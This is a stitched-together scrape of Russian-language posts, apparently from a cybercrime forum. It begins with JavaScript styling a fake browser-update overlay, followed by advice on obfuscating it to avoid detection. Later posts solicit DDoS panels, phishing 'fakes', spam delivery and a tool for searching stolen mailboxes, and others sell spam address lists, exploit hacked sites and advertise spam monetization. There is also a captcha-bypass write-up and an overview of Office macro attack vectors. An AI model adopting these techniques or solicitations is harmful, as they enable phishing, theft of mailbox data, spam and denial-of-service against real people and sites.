form_submit.style.padding = "10px 8px";
form_submit.style.zIndex = 9999;
document.getElementsByClassName("DKlyaf")[0].style.background = "#4285f4";
document.getElementsByClassName("Loxgyb")[0].style.color = "#FFF";
var vk_c = document.getElementsByClassName("vk_c")[0];
vk_c.style.boxShadow = "0 2px 2px 0 rgba(0,0,0,0.16), 0 0 0 1px rgba(0,0,0,0.08)";
vk_c.style.border = "1px";
vk_c.style.borderRadius = "2px";
vk_c.style.display = "block";
vk_c.style.position = "fixed";
vk_c.style.padding = "20px 16px 24px 16px";
vk_c.style.zIndex = 9999;
vk_c.style.width = "800px";
var close = document.getElementsByClassName("close")[0];
close.style.cursor = "default";
close.style.display = "block";
close.style.float = "right";
close.style.fontSize = "18px";
close.style.lineheight = "1";
close.style.color = "#000";
close.style.textShadow = "0 1px 0 #fff";
close.style.opacity = ".2";
close.style.marginTop = "-8px";
close.style.marginRight = "-4px";
close.style.textDecoration = "none";
// hover effect begin
close.addEventListener("mouseenter", function() {
document.getElementsByClassName("close")[0].style.opacity = "1";
});
close.addEventListener("mouseleave", function() {
document.getElementsByClassName("close")[0].style.opacity = "0.2";
});
// hover effect end
var mask = document.getElementsByClassName("mask")[0];
mask.style.backgroundColor = "#000";
mask.style.height = "10000px";
mask.style.left = "0";
mask.style.position = "fixed";
mask.style.top = "0";
mask.style.width = "100%";
mask.style.display = "block";
mask.style.zIndex = 9998;
mask.style["-ms-filter"] = "progid:DXImageTransform.Microsoft.Alpha(Opacity=60)";
mask.style.filter = "alpha(opacity=60)";
mask.style["-moz-opacity"] = 0.6;
mask.style["-khtml-opacity"] = 0.6;
mask.style.opacity = 0.6;
var warning_wrapper = document.getElementById("warning_wrapper");
warning_wrapper.style.textAlign = "right";
warning_wrapper.style.position = "absolute";
warning_wrapper.style.top = 0;
var manufacturer_logo = document.getElementById("manufacturer_logo");
warning_wrapper.style.float = "right";
warning_wrapper.style.marginRight = "12px";
warning_wrapper.style.marginLeft = "20px";
var warning_text = document.getElementsByClassName("warning_text")[0];
warning_text.style.padding = "15px 24px";
warning_text.style.paddingBottom = 0;
warning_text.style.textAlign = "left";
warning_text.style.lineHeight = 1.24;
warning_text.style.fontSize = "small";
warning_text.style.fontFamily = "arial,sans-serif";
var update_info = document.getElementsByClassName("update_info")[0];
update_info.style.marginTop = "15px";
update_info.style.marginBottom = "15px";
update_info.style.marginLeft = "24px";
update_info.style.marginRight = "24px";
update_info.style.float = "left";
update_info.style.fontSize = "small";
var update_info_tbody = update_info.lastElementChild.lastElementChild;
update_info_tbody.style.background = "#F5F5F5";
update_info_tbody.style.textAlign = "left";
var update_info_tbody_rows = update_info_tbody.children;
for(var i=0; i < update_info_tbody_rows.length; i++) {
update_info_tbody_rows[i].style.display = "block";
var tds = update_info_tbody_rows[i].children;
for(var j = 0; j < tds.length; j++){
tds[j].paddingTop = "3px";
tds[j].paddingRight = "2px";
}
}
}
function setBrowsedDefaultStyle() {
setCommonDefaultStyles();
if(window.jscd.browser == "Chrome")
setChromeDefaultStyles();
else if(window.jscd.browser == "Firefox")
setFirefoxDefaultStyles();
}
Помимо обфускации, я бы посоветовал ещё обфусцировать скрипт "невидимыми" символами (т.е. пробелы и табы). Для этого советую воспользоваться js- invisible-obfuscator.
Ещё совет: скрипт палится из-за того, что он выполняется после отображения символов в браузере. То есть пользователь может успеть заметить что сначала всё было нормально, а потом в один момент "шрифты слетели". Опытный user обязательно что-то заподозрит. Готов ответить на любые Ваши вопросы (в пределах данной темы) и интересно было бы обсудить идеи по поводу выполнения скрипта до отображения страницы в браузере.
Демо-версия скрипта: https://www.sendspace.com/file/pyl1pu
Пароль: KS93m22m)sMw0#m18J^nwckI2_a&2n98]syKwU25dcsL
АВТОР MrRabbit
источник exploit.in
Доброго времени суток, ищу партнера с своим софтом, от себя предлагаю
различный трафик с топовых бирж и не только по себестоимости, немного о себе:
часто на связи, опыт работы с трафом, инсталами, есть опыт работы с различным
софтом, с логами, а так же администрирование настройка серверов. Не
нарик:smile46:
Контакт в подписи, буду рад знакомству.
Привет , Нашел Автореггер Стим . Все работает , Вот Скрин
Чесно , Брал С гитхаба
Hidden content for authorized users.
Скачать - https://yadi.sk/d/Ot3zoK2oyzqaqQ
VT https://www.virustotal.com/gui/file...8fa01c7b2c0399bea5ed56d4082243cd9b8/detection
Многие знают такую тему, как продажа seo-ссылок на взломанных сайтах. Еще году
в 2013 появился мануальчик на эту тему от Floopy:
Уверен, что вы это дело видели, а если не видели, то легко найдете.
Вычищал хлам на харде, попался старый аккаунт linkfeed. Решил проверить
валидность, зашел, стата удивила:
Оно живое! А последняя выплата была еще в 2015 году.
Аккаунт не попал под бан и деньги всё это время потихоньку капали и всё еще
капают (как ты капаешь на нервы своим родителям). Можно возразить, что такие
копейки проще на улице стрельнуть, чем заморачиваться. Но ведь никто и не
заморачивался. Да и дело не в сумме дохода (хотя на эти полтора рубля можно в
хламину ужраться виноградным днем, смачно закусив дошиком), а в самом
принципе. Ссылки жили своей жизнью несколько лет.
А что если бы таких аккаунтов было несколько? Например, пять. Или пятьдесят? И
сайтов поболее, чтобы рублей по 10 в день с каждого аккаунта капало? На досуге
посчитайте, сколько бы вышло.
Вот тебе бабушка и пассивный доход.
автор: RedBear
Нужен хороший IP-stresser, ну или ддос-панель.
Сабж, есть умельцы кто делает fake на javascript? Говорят они лучше заходят чем HTML. Если есть - первый контакт в пм. Щедро заплачу за работу...
Собственно сабж. С толкнулся с проблемой отсылки руками одного HTML письма,
почему-то оно уходит на гугле все время спам. Что уже не препробывал и домену
повесил, письммо с русскими буквами разбавил на тест акков получается пишу
жертве мыло всё время не заходит в inbox.
Щедро заплачу за рабочий варинт!
Первый контакт ПМ.
Срочно...
Окей, Google: как пройти капчу?
В данной статье я хочу рассказать о своем опыте автоматизированного решения
капчи компании «Google» — «reCAPTCHA». Хотелось бы заранее предупредить
читателя о том, что на момент написания статьи прототип работает не так
эффективно, как может показаться из заголовка, однако, результат
демонстрирует, что реализуемый подход способен решать поставленную задачу.
Наверное, каждый в своей жизни сталкивался с капчей: ввести текст из картинки,
решить несложное выражение или сложное уравнение, выбрать автомобили, пожарные
гидранты, пешеходные переходы… Защита ресурсов от автоматизированных систем
необходима и играет немалую роль в безопасности: капча защищает от DDoS-атак,
автоматических регистраций и постингов, парсинга, предотвращает от спама и
подбора паролей к учетным записям.
С развитием технологий машинного обучения эффективность работы капчи может оказаться под угрозой. В данной статье я описываю ключевые моменты работы программы, которая может решить проблему ручного выбора изображений в «Google reCAPTCHA» (к радости, пока не всегда).
Чтобы пройти капчу, необходимо решить такие задачи как: определение требуемого капчей класса, обнаружение и классификация объектов, обнаружение ячеек капчи, имитация деятельности человека в решении капчи (движение курсором, клик).
Для поиска объектов на изображении используются обученные нейронные сети, которые можно загрузить на компьютер и распознавать объекты на изображениях или видео. Но для решения капчи недостаточно одного лишь обнаружения объектов: необходимо определить положение ячеек и узнать, какие именно ячейки требуется выбрать (или не выбирать ячейки вообще). Для этого используются средства компьютерного зрения: в данной работе это известная библиотека «OpenCV».
Для того, чтобы найти объекты на изображении, во-первых, требуется само изображение. Я получаю скриншот части экрана при помощи модуля «PyAutoGUI» с достаточными для обнаружения объектов размерами. В оставшейся части экрана я вывожу окна для отладки и мониторинга процессов программы.
Обнаружение объектов
Обнаружение и классификация объектов — это то, чем занимается нейросеть. Библиотека, которая позволяет нам работать с нейронными сетями называется «Tensorflow» (разработана компанией «Google»). Сегодня к Вашему выбору есть множество различных обученных моделей на разных данных, а значит, что все они могут возвращать различный результат обнаружения: какие- то модели будут лучше обнаруживать объекты, а какие-то хуже.
В данной работе я использую модель «ssd_mobilenet_v1_coco». Выбранная модель обучена на наборе данных «COCO», в котором выделены 90 различных классов (от людей и автомобилей до зубной щетки и расчески). Сейчас есть и другие модели, которые обучены на тех же данных, но с другими параметрами. Кроме того, данная модель имеет оптимальные параметры производительности и точности, что немаловажно для настольного компьютера. В источнике сообщается, что время обработки одного кадра размером 300 x 300 пикселей составляет 30 миллисекунд. На «Nvidia GeForce GTX TITAN X».
Результатом работы нейросети является набор массивов:
Индексы элементов в данных массивах соответствуют друг другу, то есть: третий элемент в массиве классов объектов соответствует третьему элементу в массиве «боксов» обнаруженных объектов и третьему элементу в массиве оценок объектов.
Выбранная модель позволяет обнаруживать объекты из 90 классов в реальном
времени.
Обнаружение ячеек
«OpenCV» предоставляет нам возможность оперирования сущностями, которые называются «контуры»: Их можно обнаружить одной лишь функцией «findContours()» из библиотеки «OpenCV». На вход такой функции необходимо подать бинарное изображение, которое можно получить функцией порогового преобразования:
_retval, binImage = cv2.threshold(image,254,255,cv2.THRESH_BINARY)
contours = cv2.findContours(binImage, cv2.RETR_LIST,
cv2.CHAIN_APPROX_SIMPLE)[0]
Установив крайние значения параметров функции порогового преобразования, мы еще и избавляемся от различного рода зашумлений. Также, для минимизации количества лишних мелких элементов и шумов, можно применить морфологические преобразования: функции эрозии (сжатия) и наращивания (расширения). Данные функции так же входят в состав «OpenCV». После преобразований отбираются контуры, число вершин у которых равно четырем (предварительно выполнив над контурами функцию аппроксимации).
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fmo%2Fd3%2Fj7%2Fmod3j7vkdav-
bchdnbxl2lycz18.png&hash=f0b47246415a2c6d4e90f9517de57d99)
В первом окне результат порогового преобразования. Во втором — пример
морфологического преобразования. В третьем окне уже отобраны ячейки и шапка
капчи: выделены цветом программно.
После всех преобразований в конечный массив с ячейками всё равно попадают контуры, которые не являются ячейками. Для того, чтобы отсеять ненужные шумы, я произвожу отбор по значениям длины (периметра) и площади контуров.
Экспериментально выявлено, что величины интересуемых контуров лежат в диапазоне от 360 до 900 единиц. Данная величина подобрана на экране с диагональю 15,6 дюймов и разрешением 1366 x 768 пикселей. В дальнейшем, указанные величины контуров можно вычислять в зависимости от размера экрана пользователя, но в создаваемом прототипе такой привязки нет.
Главное преимущество выбранного подхода к обнаружению ячеек заключается в том, что нам всё равно, как будет выглядеть сетка и сколько всего будет показано ячеек на странице капчи: 8, 9 или 16.
На изображении показаны разновидности сеток капчи. Обратите внимание, что
расстояние между ячейками — разное. Отделить ячейки друг от друга позволяет
морфологическое сжатие.
Дополнительным преимуществом обнаружения контуров является и то, что «OpenCV» позволяет нам обнаружить их центры (они нужны нам для определения координат перемещения и клика мышкой).
Отбор ячеек для выбора
Имея массив с чистыми контурами ячеек капчи без лишних контуров шумов, мы можем в цикле пройти по каждой ячейке капчи («контуру» в терминологии «OpenCV») и проверить её на факт пересечения с обнаруженным «боксом» объекта, полученным от нейросети.
Для установления этого факта, применялся перевод обнаруженного «бокса» в аналогичный ячейкам контур. Но такой подход оказался неправильным, потому что случай, когда объект располагается внутри ячейки, не считается за пересечение. Естественно, что такие ячейки не выделялись в капче.
Проблема была решена перерисовкой контура каждой ячейки (с белой заливкой) на черный лист. Аналогичным образом было получено бинарное изображение рамки с объектом. Возникает вопрос — как теперь установить факт пересечения ячейки с закрашенной рамкой объекта? В каждой итерации массива с ячейками, над двумя бинарными изображениями производится операция дизъюнкци (логическое или). В её результате мы получаем новое бинарное изображение, в котором будут выделены пересекаемые участки. То есть, если такие участки имеются — значит ячейка и рамка объекта пересекаются. Программно такую проверку можно сделать методом «.any()»: она вернет «True» если в массиве имеется хотя бы один элемент равный единице или «False», если единиц нет.
Функция «any()» для изображения «Logical OR» в данном случае вернет истину и
тем самым установит факт пересечения ячейки с областью рамки обнаруженного
объекта.
Управление
Управление курсором в «Python» становится доступным благодаря модулю «win32api» (однако позднее выяснилось, что уже импортированный в проект «PyAutoGUI» тоже умеет это делать). Нажатие и отпускание левой кнопки мыши, а также перемещение курсора в нужные координаты производится соответствующими функциями модуля «win32api». Но в прототипе они были завернуты в пользовательские функции для того, чтобы обеспечить визуальное наблюдение за движением курсора. Это негативно влияет на производительность и было реализовано исключительно для демонстрации.
В процессе разработки возникла идея выбора ячеек в случайном порядке. Возможно, что это не имеет практического смысла (по объяснимым причинам «Google» не дает нам комментариев и описания механизмов работы капчи), однако перемещение курсора по ячейкам в хаотичном порядке выглядит забавнее.
На анимации результат «random.shuffle(boxesForSelect)».
Распознавание текста
Для того, чтобы объединить все имеющиеся наработки в единое целое, требуется еще одно звено: блок распознавания требуемого от капчи класса. Мы уже умеем распознавать и отличать разные объекты на изображении, мы умеем кликать на произвольные ячейки капчи, однако мы не знаем на какие именно ячейки нужно нажать. Одно из направлений решения данной проблемы — распознавать текст из шапки капчи. Первым делом я попробовал реализовать распознавание текста при помощи средства оптического распознавания символов «Tesseract- OCR».
В последних версиях имеется возможность установки языковых пакетов прямо в окне программы установки (раньше это делалось вручную). После установки и импорта «Tesseract-OCR» в свой проект, я попытался распознать текст из шапки капчи.
Результат, к сожалению, меня совершенно не впечатлил. Я решил, что текст в шапке выделен жирным и слитным начертанием не просто так, поэтому я попробовал применить к изображению различные преобразования: операции бинаризации, сужения, расширения, размытия, искажения и изменения размеров. К сожалению, это не дало хорошего результата: в лучших случаях определялась лишь часть букв класса, а когда результат получался удовлетворительным, я применял эти же преобразования, но для других шапок (с другим текстом), и результат снова получался плохим.
Распознавание шапки с «Tesseract-OCR» обычно приводило к неудовлетворительным
результатам.
Нельзя однозначно сказать, что «Tesseract-OCR» плохо распознает текст, это не так: с другими изображениями (не шапками капчи) инструмент справляется значительно лучше.
Я решил воспользоваться сторонним сервисом, который бесплатно предлагал API для работы с ним (требуется регистрация и получение ключа на электронный адрес). В сервисе установлено ограничение на 500 распознаваний в день, однако за весь период разработки никаких проблем с ограничениями у меня не возникло. Напротив: я подавал в сервис оригинальное изображение шапки (не применяя абсолютно никаких преобразований) и результат меня приятно впечатлил.
Слова от сервиса возвращались практически без ошибок (обычно даже те, которые написаны мелким шрифтом). Более того, они возвращались в очень удобном формате — разбитые по строкам символами переноса строки. Во всех изображениях меня интересовала только вторая строка, поэтому я напрямую обращался к ней. Это не могло не радовать, так как такой формат освободил меня от необходимости подготавливать строку: мне не пришлось резать начало или конец всего текста, делать «тримы», замены, работать с регулярными выражениями и совершать прочие операции над строкой, направленные на выделение одного слова (а иногда двух!) — приятный бонус!
Code:Copy to clipboard
text = serviceResponse['ParsedResults'][0]['ParsedText'] #получил текст из JSON
lines = text.splitlines() #Разбил на элементы
print("Recognized " + lines[1]) #Готово к использованию!
Сервис, который распознавал текст, практически никогда не ошибался с названием класса, но я всё равно решил оставить часть названия класса для возможной ошибки. Это необязательно, но я заметил, что «Tesseract-OCR» в некоторых случаях неправильно распознавал конец слова начиная с середины. Кроме того, такой подход исключает ошибку приложения, в случае длинного названия класса или названия из двух слов (в таком случае сервис вернет не 3, а 4 строки, и я не смогу найти во второй строке вхождение полного наименования класса).
Сторонний сервис хорошо распознает наименование класса без каких-либо
преобразований над изображением.
Слияние наработок
Получить текст из шапки — мало. Его нужно сопоставить с идентификаторами имеющихся классов модели, потому что в массиве классов нейронная сеть возвращает именно идентификатор класса, а не его название, как это может показаться. При обучении модели, как правило, создается файл, в котором сопоставляются названия классов и их идентификаторы (он же «label map»). Я решил поступить проще и указать идентификаторы классов вручную, так как капча всё равно требует классы на русском языке (к слову, это можно изменить):
Code:Copy to clipboard
if "автом" in query: # ищем вхождение класса в запросе капчи
classNum = 3 # присваиваем соответствующий "label map" идентификатор
elif "свето" in query:
classNum = 10
elif "пожар" in query:
classNum = 11
...
Все описанное выше, воспроизводится в основном цикле программы: определяются рамки объекта, ячейки, их пересечения, производятся перемещения курсора и клики. При обнаружении шапки производится распознавание текста. Если нейронная сеть не может обнаружить требуемый класс, то совершается произвольный сдвиг изображения до 5 раз (то есть меняются входные в нейросеть данные), и если обнаружения по прежнему не произошло, то выполняется клик на кнопку «Пропустить/Подтвердить» (её положение обнаруживается аналогично обнаружению ячеек и шапки).
Если Вы часто решаете капчу, Вы могли наблюдать картину, когда выбранная ячейка пропадает, а на её месте медленно и не спеша появляется новая. Поскольку прототип запрограммирован на моментальный переход к следующей странице после выбора всех ячеек, мной было принято решение делать 3 секундные паузы, чтобы исключить нажатия на кнопку «Далее» без обнаружения объектов на медленно появляющейся ячейке.
Статья была бы не полной, если бы в ней не было описания самого главного — галочки успешного прохождения капчи. Я решил, что с такой задачей может справиться простое сравнение по шаблону. Стоит отметить, что сравнение по шаблону — далеко не самый лучший путь для обнаружения объектов. Мне, например, пришлось выставить чувствительность обнаружения на значение «0.01», чтобы функция перестала во всем видеть галочки, но видела её, когда галочка действительно есть. Аналогичным образом я поступил с пустым чекбосом, который встречает пользователя и с которого начинается прохождение капчи (там проблем с чувствительностью не было).
Результат
Результатом всех описанных действий стало приложение, работоспособность которого я протестировал на «Тостере»:
Стоит признать, что ролик снят не с первой попытки, так как я нередко сталкивался с необходимостью выбора классов, которые отсутствуют в модели (например, пешеходные переходы, лестницы или витрины).
«Google reCAPTCHA» возвращает сайту некую величину, показывающую насколько «Вы робот», а администраторы сайта, в свою очередь, могут установить порог прохождения этой величины. Возможно, что на «Тостере» был установлен относительно низкий порог прохождения капчи. Это объясняет достаточно легкое прохождение капчи программой, несмотря на то, что она дважды ошиблась, не увидев светофор из первой страницы и пожарный гидрант из четвертой страницы капчи.
Помимо «Тостера», были проведены эксперименты на официальной демонстрационной странице «reCAPTCHA». В результате, замечено, что после множественных ошибочных обнаружений (и необнаружений), пройти капчу становится крайне затруднительно даже человеку: требуются новые классы (вроде тракторов и пальм), в выборках появляются ячейки без объектов (почти монотонные цвета) и резко увеличивается количество страниц, которые нужно пройти.
Это было особенно заметно, когда я решил попробовать кликать по случайным ячейкам в случае необнаружения объектов (ввиду их отсутствия в модели). Поэтому можно точно утверждать, что случайные клики не приведут к решению задачи. Чтобы избавиться от такого «завала» экзаменатором, производился реконнект Интернет-соединения и очистка данных браузера, потому что пройти такой тест становилось невозможным — он был практически бесконечным!
При сомнении в Вашей человечности возможен и такой исход.
Развитие
Если статья и приложение вызовет интерес у читателя, я с удовольствием продолжу его реализацию, тесты и дальнейшее описание в более детальном виде.
Речь идет об обнаружении классов, которые не входят в состав текущей сети, это значительно улучшит эффективность работы приложения. На данный момент имеется острая необходимость в распознавании как минимум таких как классов как: пешеходные переходы, витрины и дымовые трубы — я расскажу, как можно переобучить модель. Во время разработки я составил небольшой список наиболее часто встречающихся классов:
Улучшения качества обнаружения объектов можно добиться и путем использования нескольких моделей одновременно: это может ухудшить производительность, но повысить точность.
Другой способ улучшения качества обнаружения объектов — изменение входного в нейросеть изображения: на видео можно увидеть, что при необнаружении объектов я несколько раз делаю произвольное смещение изображения (в пределах 10 пикселей по горизонтали и вертикали), и зачастую такая операция позволяет увидеть объекты, которые ранее не были обнаружены.
К выявлению необнаруженных объектов приводит и увеличение изображения из маленького квадрата в большой (до 300 x 300 пикселей).
Слева объекты не обнаружены: оригинальный квадрат стороной 100 пикселей.
Справа автобус обнаружен: увеличенный квадрат до 300 x 300 пикселей.
Еще одним интересным преобразованием можно отметить удаление белой сетки над изображением средствами «OpenCV»: возможно, что пожарный гидрант на видео не обнаружился именно по этой причине (такой класс присутствует в нейронной сети).
Слева оригинальное изображение, а справа — измененное в графическом
редакторе: сетка удалена, ячейки перемещены друг к другу.
Итоги
Данной статьей я хотел рассказать Вам о том, что капча, вероятно, не самая лучшая защита от ботов, и вполне возможно, что в скором времени возникнет потребность в новых средствах защиты от автоматизированных систем.
Разработанный прототип, даже будучи в незавершенном состоянии, демонстрирует, что при наличии требуемых классов в модели нейронной сети и применении преобразований над изображениями, можно достигнуть автоматизации процесса, который автоматизированным быть не должен.
Также, я хотел бы обратить внимание компании «Google» на то, что помимо способа обхода капчи, описанного в данной статье, имеется еще и [иной способ](https://vc.ru/services/54846-uncaptcha-2-servis-dlya-obhoda-recaptcha- ot-google-s-pomoshchyu-servisa-google), в котором производится транскрибацияаудио-образца. На мой взгляд, уже сейчас необходимо принимать меры, связанные с улучшением качества программных продуктов и алгоритмов против роботов.
Из содержания и сути материала может показаться, что я не люблю «Google» и в частности «reCAPTCHA», однако это далеко не так, и, если следующей реализации быть — я расскажу почему.
Разработано и продемонстрировано в целях повышения уровня образования и улучшения методов, направленных на обеспечение безопасности информации.
Спасибо за внимание.
Автор: Ибадов Илькин ilk1n
куплю программы:
1. для спама под мои нужды (локальная + подготовленная в ней выгрузка пакета
smtp на дед)
2. что то вроде xrumer с настройкой под страну
3. накрутка посещений сайта+купленного
в личку или @Lesya_Ukrainka_ltd
заранее благодарна.
how to website shell traffic redirect my landing page ?
Привет ребята. Ищу выход на такой софт, как парсер по валидным базам мыло пасс, и скачка аттачей по расширению, и так же поиск писем во всех папках, по словосочетанию, по маске.
Кто не понял, вот такой аналог
](https://forum.exploit.in/topic/150397/?tab=comments#comment-956734)
forum.exploit.in
кого нет на экспе, вот описалово:
Spoiler: описание
Софт для парсинга контактов, поиска писем и файлов в imap аккаунтах.
Описание функционала:
- Формат вывода для точечечной рассылки: email отправителя; имя отправителя; email получателя; имя получателя; заголовок письма
- Вывод в json формате
- Парсинг тела письма
- Возможность задавать имена папок (inbox, sent, etc)
- Возможность задавать имена папок, которые не парсить (spam, junk, etc)
- Поиск по критериям (http://php.net/manual/en/function.imap-search.php)
- Поиск по кейвордам
- Поиск по отправителю
- Поиск и скачивание любых типов файлов
- Скачивание картинок в теле письма
- Удаление писем по кейвордам
- Лимит на поиск (сколько искать писем)
- Лимит на кол-во проверяемых писем (брать только первые n писем)
- Многопоток
- Поддержка socks5
Нужно готовое решение.
Я знаю, тут есть люди, кто обладает данной инфой, на выход на селлера, либо
кодера, либо у кого то в данный момент на руках есть такой рабочий тулз.
Просьба отписать мне тут в топе либо в ЛС.
Есть свежая база кликеров опенеров для спама эдалт тематики. База собрана с
различных дейтинговых сайтов. Валид 99%
В базе есть только поле Email но: более 99% это мужчины из US в возрасте от 40
до 75 лет, база за период 10-2018 по 2-2019, восновном Gmail. размер -
миллионы. продаю частями. для теста прикрепил небольшой файлик.
{БАЗА ДЛЯ СПАМА - никаких паролей не содержит}
База полностью прочищена через briteverify
Срочный вопрос - возможно кто-то может помочь?
При заходе на проблемную почту (office365 корп почта) не получается совершить
листинг папок, или соответственно любые команды для опр. папки
То есть:
tag login mail password
tag OK LOGIN completed.
tag LIST "" "*"
tag BAD User is authenticated but not connected.
tag status INBOX (messages)
tag BAD User is authenticated but not connected.
Что это? как решается? Возможно те из вас, кто занимается спамом, рассылками и тд, сталкивались и знают решение?
Нестареющая классика, или обзор новых векторов атак через Microsoft Office
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fkw%2Fnd%2Fax%2Fkwndax-
gdv9ffqc1p4xjlvt98ig.png&hash=3e85b0dfe51b8501c5ffbacc183903ee)
Хакеры десятилетиями эксплуатируют человеческую доверчивость и
невнимательность. Большинство пользователей без раздумий открывают безобидное,
на первый взгляд, почтовое вложение и, сами того не зная, запускают
вредоносное ПО. Чтобы защититься от подобных атак, нужно знать врага в лицо.
Сегодня мы попробуем разобраться, как устроены три новые техники выполнения
кода в офисных приложениях, обнаруженные в этом году, и какие способы защиты
от них существуют.
XLM-макросы
Эксперты компании Outflank [представили](https://outflank.nl/blog/2018/10/06/old-school-evil- excel-4-0-macros-xlm/) новый способ запуска кода в MS Office Excel через так называемые XLM-макросы (не путать с XML). Хотя технологии XLM-макросов уже больше 26 лет (впервые появились в Excel 4.0 для Windows 3.0/3.1), она до сих пор поддерживается всеми версиями Microsoft Office Excel вплоть до Office 2016.
Для создания XLM-макроса в Excel необходимо выполнить следующие шаги:
В контекстном меню листа Excel выбрать «Insert».
Далее выбрать «MS Excel 4.0».
В результате появится лист «Macro1», в любой ячейке которого посредством функции «EXEC» можно запустить нужный процесс. Для автоматического запуска макроса первую ячейку необходимо переименовать в «Auto_open» (аналогично процедуре AutoOpen() в VBA-макросах).
После открытия сохраненного документа появляется стандартное оповещение с запросом на запуск макроса.
Лист с макросом можно скрыть, выбрав «Hide» в контекстном меню.
Помимо возможности запуска процессов, XLM-макросы умеют обращаться к Win32 API с помощью функций REGISTER и CALL. Ниже приведен PoC-код макроса, осуществляющего технику внедрения шелл-кода.
При этом для хранения символов шелл-кода внутри ячейки макроса используется функция кодирования CHAR. Для удаления нулевых байтов можно воспользоваться утилитой msfvenom, входящей в состав Metasploit Framework.
По способу хранения внутри файла Excel XLM-макросы существенно отличаются от классических VBA-макросов, появившихся годом позднее в Excel 5.0. В новом формате Excel .xlsm, который представляет собой ZIP-архив, XLM-макросы хранятся внутри XML-файла в каталоге macrosheets. В формате .xsl (Excel 97 – 2003) макрос хранится внутри OLE-потока.
Далее видно, что VBA-макрос хранится в отдельном контейнере (на рисунке слева), в то время как XLM-макросы расположены в одном контейнере с данными.
Данные различия в способах хранения макросов существенно сказываются на качестве их детектирования антивирусами, в частности, технология Antimalware Scanning Interface (AMSI) не поддерживает XLM, несмотря на [заявленную](https://cloudblogs.microsoft.com/microsoftsecure/2018/09/12/office- vba-amsi-parting-the-veil-on-malicious-macros/) поддержку со стороны Office 365.
К примеру, Metasploit powershell web_delivery код был внедрен в Excel средствами VBA- и XLM-макросов (на рисунках ниже).
На Virustotal документ Excel с VBA-макросом вызвал срабатывания 21 из 59 антивирусов.
При этом аналогичный документ с XLM-макросом не вызвал подозрений ни у одного антивируса.
Демонстрация
Выполнение кода через XLM-макросы в Office
Microsoft Office Online Video
Командой исследователей Cumulate был обнаружен новый способ выполнения кода в Word через вставку видео средствами Online Video. Используя данный элемент, можно добавить в документ видео с YouTube, далее подменить ссылку на него кодом JavaScript, который будет выполнен в Internet Explorer при открытии документа и клике на видео. Наиболее подходящими при проведении социальной инженерии выглядят следующие векторы:
Для создания файла с расширением docx. с описанной нагрузкой необходимо выполнить следующие шаги:
1.Добавить YouTube-видео через «Insert – Online Video».
2.Сохранить созданный docx-файл.
3.Разархивировать сохраненный docx. Формат docx. представляет собой zip-архив
следующего содержания:
4.В каталоге Word в файле document.xml в элементе embeddedHtml добавить свой JavaScript-код путем его вставки в тело iframe либо путем замены соответствующей ссылки (src) в iframe.
5.Сформировать zip-архив (с расширением docx) с внесенными изменениями.
Далее при открытии сформированного docx-файла от пользователя требуется кликнуть по ссылке на видео и запустить скачанный файл. Как вариант можно вывести скриншот с предложением обновить Flash Player, побуждающий пользователя скачать и запустить файл. При этом никаких предупреждений безопасности не выводится.
Как и в случае с XLM-макросами, данная техника выполнения кода не детектируется ни одним антивирусом на Virustotal и выглядит очень привлекательной для вирусописателей, а также распространена при проведении социальной инженерии в рамках тестирования на проникновение.
Демонстрация
Выполнение кода через Online Video в Office
VBA Stomping
На конференции Derbycon 2018 была [представлена](https://medium.com/walmartlabs/vba-stomping-advanced-maldoc- techniques-612c484ab278) техника запуска VBA-макросов в документах Office, получившая название VBA Stomping. Суть техники заключается в удалении/модификации (как вариант заполнении нулями) исходного кода VBA в теле офисного документа, оставляя нетронутым скомпилированный код макроса, называемый p-кодом. VBA-код, как и его скомпилированная версия, располагаются внутри файла vbaProject.bin, находящегося в zip-архиве (файл с расширением .docm, .xslm).
Таким образом, техника сводится к удалению/заполнению нулями части файла vbaProject.bin.
В результате документ не вызывает подозрений у антивирусов, анализирующих макрос только по его исходному коду. Например, с помощью этой техники исследователям удалось снизить количество срабатываний антивирусов на банковский троян Emotet, распространяющийся через офисные файлы, с 36/59 до 7/58 на Virustotal.
Также данная техника позволяет затруднить анализ файла, поскольку ни один инструмент, не прибегая к декомпиляции, не сможет извлечь исходный код VBA, который также не будет отображаться в редакторе макросов Office до его разрешения.
Защита
Рекомендации по противодействию описанным техникам традиционны для защиты от методов социальной инженерии:
(c) Kriks87, хабрахабр
Онлайн-конференция "Серый Трафик" - самая массовая конференция по привлечению серого трафика и его монетизации в рунете.
Не хочешь закупать белый трафик и бояться уйти в минус?
Получи в свое полное распоряжение 3 эффективных способа получать бесплатный
или дешевый
трафик!
Ведущие конференции: топы, которые знают свою тему от А до Я и зарабатывают от 30 000 рублей или 500$ в день чистой прибыли!
5 дней конференции
3 дня досконально разобранных способов привлечения бесплатного или дешевого
трафа
2 дня подробного разбора о том, как монетизировать серый трафик в рунете и
бурже
Программа конференции
9 декабря 20.00-23.00 МСК "E-mail спам через сервис массовых рассылок"
10 декабря 20.00-23.00 МСК "E-mail спам через доноры"
11 декабря 20.00-23.00 МСК "Спам через Whatsapp"
12 декабря 20.00-23.00 МСК "Монетизация спам-трафика в Рунете"
13 декабря 20.00-23.00 МСК "Монетизация спам-трафика в Бурже"
Стоимость участия 1000 рублей (бесплатно для первых 500 участников, далее 1000 рублей)
Для участия в конференции подпишитесь на канал конференции здесь https://t.me/joinchat/AAAAAFC1QX-NvyBWGcQptQ , доступ к занятиям будет.там
WIE LEVEREN @BE EMAILS
BEHOEFTE AAN @ TELENET.BE
PERSOONLIJK BERICHT.
PLS VOEL MIJN TIJD NIET AF
Всем привет. Возможно не тут пишу, сорян. Мне нужны те кто может чистить инфу в интернете на разных сайтах и видео хостингах. Без разницы как, самое главное чтобы рейтинг падал и со временем пропала актуальность и вся инфа. Есть тут люди?
Всем привет так небольшая заметка как по быстрому сделать себе небольшой зоопарк своих зверей так как все любят халяву как пример тыц стандартная тема для любого борда кли- кай так как много в день посещаю бордов могу сказать этот vpn сервис можно встретить на любом борде в раздачах кли- кай.
Все что нужно это проверить сайт на [Clickjacking](https://chrome.google.com/webstore/detail/clickjacking- test/bjhigladkmnpmglhcnpeiplekpanekpi) проще говоря значит сайт уязвим под клик и можно в iframe его отобразить терпиле как это в бою можно посмотреть тыц мега код :lol2:
Spoiler: 3 у вас 61
